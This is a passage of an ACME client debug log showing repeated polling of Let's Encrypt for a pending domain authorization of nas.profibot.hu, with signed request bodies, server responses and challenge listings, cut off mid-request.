+Replay-Nonce: fULB7aUJEwsbBhGE8tF2K0DQrchPmuOYvjz5UUH2MfXFIblKtzk +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:04:35,545:DEBUG:acme.client:Storing nonce: fULB7aUJEwsbBhGE8tF2K0DQrchPmuOYvjz5UUH2MfXFIblKtzk +2025-12-25 04:04:35,546:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:04:38,547:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:04:38,551:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSkV3c2JCaEdFOHRGMkswRFFyY2hQbXVPWXZqejVVVUgyTWZYRklibEt0emsiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "IIZh8X3dHdQBSM275njjUUvSpvbx8pq5oMGkrDIG01UXexmUV973Nxw_dR845rPEAF_zAtk0ZQQmPd8Xc7vKwmUZPsvZuhc_Ucnvg_FHZKNsqyTvf5G0yCVjLUeCBk-VZXdjQS_txUlrvz_vxarb8GwQELtFqUajFcZuGjVOyCNnMubmYcqCV3dSAULDGvZ-vXATYuw8DYREGWBpE_jC9bVXJkSBc6dbIToBpRUiT7MMZzXy9v9tdSD8lGsovNvkbMEpAz1c5CmHrIKWUFTK_qeO0tvSKyjlG3kZ0c7RWv8ustzQo1kqRNC3BCmVgpNbOYi60KOm8IeXdOJ7ZU4pVw", + "payload": "" +} +2025-12-25 04:04:38,718:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:04:38,719:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:04:38 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJB8HI5zDjZIsWX2wV15uucBTNqhegsvhps92xoCoAJdE +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:04:38,720:DEBUG:acme.client:Storing nonce: fULB7aUJB8HI5zDjZIsWX2wV15uucBTNqhegsvhps92xoCoAJdE +2025-12-25 04:04:38,720:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:04:41,721:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:04:41,725:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSkI4SEk1ekRqWklzV1gyd1YxNXV1Y0JUTnFoZWdzdmhwczkyeG9Db0FKZEUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "KgFlY8oJZ8N5_MSQ4ir0xKWmEo1tBphHKXpOuFOarth1A9vvDs2KYFiPcpGvlaZvYXEcb_nxDZC80M22bbGtVHU66alEBsYy2XTpjj4yM-iU2DN77cGfzsU1DggT6Ma5DxHvhXfnofjkiwaA7tLN5666hCqJJVpwkYQiqg4_6uzEmiCCDXPXeYliW-c2fPvYo9HmByptIcrMr7IvQLKYIvLT6u4r_7cM9LJpw0I_0ychfX8fseLIczVnpxuRXURujLk9GNd4rqz74wTX0FHtPMyTkgjHRlJmEgScGGNciuKFfVoMzqRtarpo1mtXw8IQoBGzbsw3vGVMCwDXx9LeqQ", + "payload": "" +} +2025-12-25 04:04:41,882:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:04:41,883:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:04:41 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEiau0os1UXApIU7WBrsoaJqhqUoyXDgfn1TsYBC_inXM +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:04:41,883:DEBUG:acme.client:Storing nonce: 58tS3qjEiau0os1UXApIU7WBrsoaJqhqUoyXDgfn1TsYBC_inXM +2025-12-25 04:04:41,884:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:04:44,885:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:04:44,889:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRWlhdTBvczFVWEFwSVU3V0Jyc29hSnFocVVveVhEZ2ZuMVRzWUJDX2luWE0iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "GFrHXEsETw2-ScmfTOb2FQ4100sBA6ilSe_aRsGpaPIageYZc_NSFf8eE0IqY6trnccog4mppScm07vr2Re_zmuTP29ClAmBQzGYN6NpSp6kagt3o9czDOCGa13Ubv5P_NhdhhQoltXENUVpsyceaaaBomjKcLafyk8sSjCSIs7oK36iY4VSt_QG-ZUSYJIROv9YHA8r6C6zmysbWlNQoaaYNWyAktG6SysZ3nNledm59xhMECXrsJHPLv7qpYhi-RdsqimXJU9_dlUoe-kRzieLgZFAtfxyfBrtWHSiEEAfJyYQ2IFViBlH5Z6tUXCgQI6g5ZPwXNdQK0GOEwxuSw", + "payload": "" +} +2025-12-25 04:04:45,057:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:04:45,058:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:04:44 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjE-qDCXPoRxKMRpZ5ahSKv92l3sI4WIGJ5phUvPrpX35g +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:04:45,058:DEBUG:acme.client:Storing nonce: 58tS3qjE-qDCXPoRxKMRpZ5ahSKv92l3sI4WIGJ5phUvPrpX35g +2025-12-25 04:04:45,059:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:04:48,060:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:04:48,062:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRS1xRENYUG9SeEtNUnBaNWFoU0t2OTJsM3NJNFdJR0o1cGhVdlBycFgzNWciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "M9peiLYfK-3kbkkMUYWwt1zYh-RwaNUn4aMuQv6M4mKrrXlIB6HUgYUWYZgWEbhgSoyC5bBXzSbMDrVY8uEMq27mGfVfOjbwB_OogQIMKeS1_o0LgwXBAv20Rq2RptNID4Au4Eb8o2dnIfOTL7o4LFq2hXxh-_6XXdfPQXiJ2aYAcTBYPeqCYMklqa4fIdgW-KQptNxwfENnP_GkuBxWATNCXy-4mFl9jDxehAQ_YPEN7rthHNEUNIe97LBXpiqFz4vAkFJkh1L9BnPHsnQgOwMXOWskm2PedKwJE8fWU_HQoW-bxiHnLpqT8BD-8AsreuvqREbwVq5zQqfzF2qewQ", + "payload": "" +} +2025-12-25 04:04:48,218:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:04:48,219:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:04:48 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJd3PpbiTX8HVXFX1Awho7IodtoTkDM0gsqyfpyREmva0 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:04:48,219:DEBUG:acme.client:Storing nonce: fULB7aUJd3PpbiTX8HVXFX1Awho7IodtoTkDM0gsqyfpyREmva0 +2025-12-25 04:04:48,220:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:04:51,221:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:04:51,225:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSmQzUHBiaVRYOEhWWEZYMUF3aG83SW9kdG9Ua0RNMGdzcXlmcHlSRW12YTAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "JhxXR8QFMUwxDGN4dt0JqQbGg1Vas7HthxPGc5RxKezq-4JF-JSizQUpgNvx8gmEkjUbuVL_siCX9xVAGRtnwJg7lTnIrkGI6stiIDLCNVRCF5hoPXUPT-wHQi7To7pssmaWIYt-3rhJonrMMYORW9gbL6cUZk4FghfTBVswVnnMqwrrwMELYpaAk4l-6fxBou3lXAI3-iTNQDwB0ItY7slFGVEys1g_de22iXKSgP82PT65OyJNL9OX_-FULh43Vo8Bovg0sbTvWnA6Xw0ew2JYwZgPLrkZvUG3USX3ofvH1pUFsVLYPBY1DDN1a1sjIkct6LESA82-lPLmlJC_mg", + "payload": "" +} +2025-12-25 04:04:51,381:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:04:51,381:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:04:51 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJC-LIRTKyq_Kz-RU2tEh2RIzZT839-dFiInToHL9M558 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:04:51,381:DEBUG:acme.client:Storing nonce: fULB7aUJC-LIRTKyq_Kz-RU2tEh2RIzZT839-dFiInToHL9M558 +2025-12-25 04:04:51,382:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:04:54,382:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:04:54,386:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSkMtTElSVEt5cV9Lei1SVTJ0RWgyUkl6WlQ4MzktZEZpSW5Ub0hMOU01NTgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "AmEAIxvbdA4m5oi2116BJ_FXxGhWDyohVL1o42eeEQQhuu8wKnf64JoDWKXBjclrlwpJjoUNdbycK58e2g2Oo1WQKMyS5MmRHVsqX0063Bo0TiN5hui60xv1VZYVZmBIEwMt7i8wNxLYJl1KD_9LQ7KXmsr2IVbjD4kSQRw_-shL5Gzt_JA_bvIKsvAwfAyRqDiLL7_EvJYSGTqx0RoXZVhUPzH-iZkMs7Xb5ygPje3YuIM2bZg2kvuv0eUl5Jkw6leaRogPTjbS6S3-7O82pT4S_r-U7CyNSnlZGLJ6hUdLUTmTiGCq2y1wlCtkzget1MNWcCx8v2FYLdWTISXK5g", + "payload": "" +} +2025-12-25 04:04:54,554:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:04:54,555:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:04:54 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjE7SJ-LYIxIKfS6IrY2LnifzMC9pUL89vEW1Voxs_CwKc +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:04:54,555:DEBUG:acme.client:Storing nonce: 58tS3qjE7SJ-LYIxIKfS6IrY2LnifzMC9pUL89vEW1Voxs_CwKc +2025-12-25 04:04:54,556:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:04:57,557:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:04:57,561:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRTdTSi1MWUl4SUtmUzZJclkyTG5pZnpNQzlwVUw4OXZFVzFWb3hzX0N3S2MiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "ZRANNDE91Sb4QruRmH_kbcsEyPfgYfLwBiSvSCNgoLeCjXOrOikQuzmyu8uhWnrihgdLHUcfGaOgz30mYaOxcmLC1O5yOZ5aej40yS6qtg4PYVUWxIeNEUgyVw-SbXGnsxd9vAsaAESxFA92x8p84m_2-ahfII-LHlhuLcOeWL1T7_vtC1dkJz_E1562CFDMz2RREFcp6UZA75MOXCfTDVP85Ad8KuhCyNvw7xTxUheWfEF2_hvuKqxKfZJpp9tLPVmBdXX3Kevziiow6STuEmg0Ux-Uxj76c3LYA_sxJu-fySDHVPRFbphO62TD4wkzVklbJGJXV-zCt7b06JuPAw", + "payload": "" +} +2025-12-25 04:04:57,717:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:04:57,718:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:04:57 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEqvKTrnuDXdzdCSPKjPsqbzcPz9cTvRUggB-zZSZPrAQ +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:04:57,719:DEBUG:acme.client:Storing nonce: 58tS3qjEqvKTrnuDXdzdCSPKjPsqbzcPz9cTvRUggB-zZSZPrAQ +2025-12-25 04:04:57,719:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:05:00,720:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:05:00,724:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRXF2S1RybnVEWGR6ZENTUEtqUHNxYnpjUHo5Y1R2UlVnZ0ItelpTWlByQVEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "OneMWZQtbYgCfYECjg-6vB8dUJ25SMJO4gtfzBd9umgEbx-9AIKjUD-kEmHidND-aoe9cFGayJDgaHmbRm84WvCxciFAWfrVFdx8Baqo20h8jdqMawRxFmMz6UyBOnY7D8OwUxHavo-6GKqwd8LJ10axvraqKx47Ju0sUNO6VCjmh0Du0g4C4kbQPfQJIYKqmL6qsD6_rpypx_0sYKIzLG4hcngiDO2W9YM763pg71Ej4ZKLc7h7DIQ9NSz8Vbb58leY_lRNcFtSZ0qRgZRk9Amx_ci7yYjZ_4vX9VdNBRBF3K-e29cdMH0xIRPCdvHe7CDo2zboxOD7tAnstgTMog", + "payload": "" +} +2025-12-25 04:05:00,880:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:05:00,881:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:05:00 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjECFmHLOqy_Zc6NHOgIOzGBJ_GZntBtqNFKIBVjrDAISg +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:05:00,881:DEBUG:acme.client:Storing nonce: 58tS3qjECFmHLOqy_Zc6NHOgIOzGBJ_GZntBtqNFKIBVjrDAISg +2025-12-25 04:05:00,882:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:05:03,883:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:05:03,887:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": 